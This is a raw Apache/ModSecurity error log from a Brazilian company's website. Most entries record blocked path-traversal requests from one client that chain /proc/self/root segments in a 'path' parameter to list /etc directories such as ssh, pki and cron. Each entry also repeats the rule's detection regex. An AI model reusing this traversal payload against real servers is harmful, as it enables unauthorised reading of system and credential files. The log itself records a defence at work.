[Tue Mar 17 18:36:32.848791 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:42932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJYNY0UrI5A3LftIwYdwAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:34.207920 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:42942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJYtY0UrI5A3LftIwYewAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:35.361018 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:42954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJYweiSKl8TjouI-YyDwAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:36.892309 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:42970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJZNa6ubjKNq_cu4YiCgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:38.409439 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:43746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJZtY0UrI5A3LftIwYfwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:39.969281 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.241.31:43750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJZ8U6Sx0TG1YjmQjIsgAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:42.366817 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.31:43760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJageiSKl8TjouI-YyGgAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:44.463856 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:43764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJbPPqhzTj3BvfDX-hlgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:47.246073 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:45822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJb9Y0UrI5A3LftIwYhQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:50.151431 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:45830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJcoh-PF_25v4hFRCEmgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:52.130128 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43212] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:36:56.851547 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:59612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJeNY0UrI5A3LftIwYigAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:00.899266 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:45834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJfOyqAr6etmhZHNpCDgAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:03.685501 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:38830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJf4h-PF_25v4hFRCErwAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:14.097862 2026] [proxy_fcgi:error] [pid 25836:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43676] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:37:18.094572 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:47638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJjgeiSKl8TjouI-YyJQAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:24.178927 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:49104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJlOyqAr6etmhZHNpCGwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:36.097624 2026] [proxy_fcgi:error] [pid 29151:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44230] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:37:37.437876 2026] [:error] [pid 29151:tid 140411599251200] [client 74.7.241.31:60948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJofPqhzTj3BvfDX-hqQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:41.099295 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:60956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJpaBJNF7axNlVR0Uy4QAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:43.970153 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:60972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJpweiSKl8TjouI-YyLwAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:58.145845 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:37:59.972385 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:60976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJt8U6Sx0TG1YjmQjI0AAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:37:59.972742 2026] [mime_magic:error] [pid 7004:tid 140411674785536] (70014)End of file found: [client 74.7.241.31:60976] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:00.870894 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.241.31:48516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJuHIk7brgkOH-rIWnIwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:01.108269 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:48516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJuXIk7brgkOH-rIWnJQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
